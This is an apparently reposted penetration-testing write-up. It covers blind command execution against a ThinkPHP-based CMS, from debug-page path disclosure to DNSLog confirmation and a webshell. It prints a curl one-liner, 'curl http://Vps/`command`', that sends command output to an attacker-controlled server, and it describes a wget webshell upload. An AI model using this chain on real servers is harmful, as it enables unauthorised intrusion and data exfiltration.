当前位置:网站首页>Penetration practice - no echo rce thinkphp5 getshell
Penetration practice - no echo rce thinkphp5 getshell
2022-04-21 08:51:00 【amingMM】
Find a login interface in the process of information collection
In the process of testing logical vulnerabilities , When modifying the parameters, it broke out Debug


adopt Debug Information learned , This is a thinphp Of cms
Before thinkphp The log leak vulnerability of has been tried and tested repeatedly , So I want to find the log first

adopt Debug You can know that his root directory is /www/wwwroot/devorder/public
visit Public A file in a directory , Can't access runtime Catalog , We can only find another way

Found at the bottom Cms Version number of , So I went to the Internet to find the open loopholes of this version

After searching for 、 test , It is found that there are... Caused by variable coverage Rce Loophole
Specific vulnerability analysis can refer to https://blog.csdn.net/xuandao_ahfengren/article/details/86333189
Direct use of online Payload The function that prompts to execute the command is disabled , Estimation is Disable_function The role of

There are several functions that execute commands. After sending a request, they will directly return to the login interface , Unknown execution state

So I found an online DnsLog platform , This platform will randomly give a subdomain name .
If you send to a subdomain Http、Icmp My bag , The platform will receive packets , So as to determine whether the command is executed .
In this way sql This method also works wonders in Injection .
For specific usage, please refer to the article written by the master :https://www.cnblogs.com/sstfy/p/10351807.html
Several times here Ping After that, I still can't receive the return , Guess maybe Icmp The bag was stopped , Instead of using Curl Request subdomain name

Successfully received request

This kind of online can only simply verify whether it exists Rce, Unable to get command echo .
If you want command echo , You can use online Ceye Platform to receive echo .
You can also use your own Vps To receive echo
stay Vps Turn on Web The service or firewall is not disabled Icmp When , send out Http or Icmp After the package, a record will be left in the log , The command echo can be obtained by directly viewing the log records .
for example :
curl http://Vps/`command`
Here, use the return quotation mark to wrap the command to be executed , The principle is Linux Executing a command in will first execute the command in anti single quotation marks , And output the result .
This code is after execution whoami after , The returned value will be spliced into http://Vps/ after .
I choose to open here Web service
Look at the results returned this time , The access record in the log is http://Vps/www , We can know that the target system is Linux, And use WWW Permission on Web service .

Getshell
tried bash rebound Shell The way didn't bounce back .
I don't know why I use echo >> The method can't be written in , Finally using Wget Download the file to the specified directory .
These two questions , If it's convenient for you to know the master, tell me through comments , Thank you first .
adopt Debug The absolute path in WebShell I can't find what I wrote after Webshell, So in Web Find the login interface under the directory , Success is really . Absolute path .

take Webshell Written in VPS in , Again using Wget download Webshell To the truth . Absolute path , success Getshell.

版权声明
本文为[amingMM]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204210831568766.html
边栏推荐
- 7.4 parallel convolutional neural network googlenet
- [CTF. Show. Reverse] moon cake cup RE1_ Northwest Wangxiang, re2_ Homing, RE3_ If there is no month
- C语言计数排序
- 年金险安全靠谱吗?收益是多少啊?
- Add log4j log function
- JS -- closure
- 曾经有望挑战苹果的魅族,如今靠为苹果用户提供配件而生存
- ue5 小知识点 动画蓝图接口 不能在editor中复制新的
- Eight sorts (Part 1)
- Overview of VoIP technology development and its relationship with outbound call system
猜你喜欢

内网渗透-代理穿透-提权-注入-msf-中间件-域渗透-日志清除-学习资源
![[GYCTF2020]Blacklist](/img/23/14236d426700925f2da86119b2e4f7.png)
[GYCTF2020]Blacklist

Flink's API introduction case

电网企标B接口接入记录(二):资源上报

Simulated 100 questions and simulated examination of Shanghai safety officer C certificate examination in 2022

State Grid Enterprise standard B interface record (attachment): address code of video monitoring system

多线程小抄集(新编四)
![BUUCTF[极客大挑战 2019]EasySQL](/img/35/84422c6aea0c96f6cbcf8354729604.png)
BUUCTF[极客大挑战 2019]EasySQL

【Appium】使用模拟器实现有道云App的业务功能-新增、搜索、修改、删除
![[appium] use the simulator to realize the business functions of Youdao cloud app - add, search, modify and delete](/img/a5/485762fe701f261de213f793580486.png)
[appium] use the simulator to realize the business functions of Youdao cloud app - add, search, modify and delete
随机推荐
2022年流动式起重机司机考试练习题模拟考试平台操作
Common file types and content type of Apache Tika
改头换面,大排量合资7座SUV,新款现代帕里斯帝产品力怎么样?
Compile pyx file into PYD file (many pits have been solved)
最新系统漏洞--OMERO.web跨站脚本漏洞
Oozie common commands
渗透实战-无回显Rce-thinkphp5-Getshell
LDO系列--PSRR
Add log4j log function
物联网智能网关工控串口数据透传WiFi模块的选型
2022 tea artist (primary) examination questions and online simulation examination
电网企标B接口接入记录(二):资源上报
Various database connection strings (efcore)
LDO series -- PSRR
Ue5 little knowledge point animation blueprint interface cannot copy new in editor
互动多媒体应用所表现的特点
【MySQL】基于Linux-CentOS7.9的详细安装教程
[CTF. Show. Reverse] moon cake cup RE1_ Northwest Wangxiang, re2_ Homing, RE3_ If there is no month
BUUCTF[极客大挑战 2019]Havefun
图像的主题模型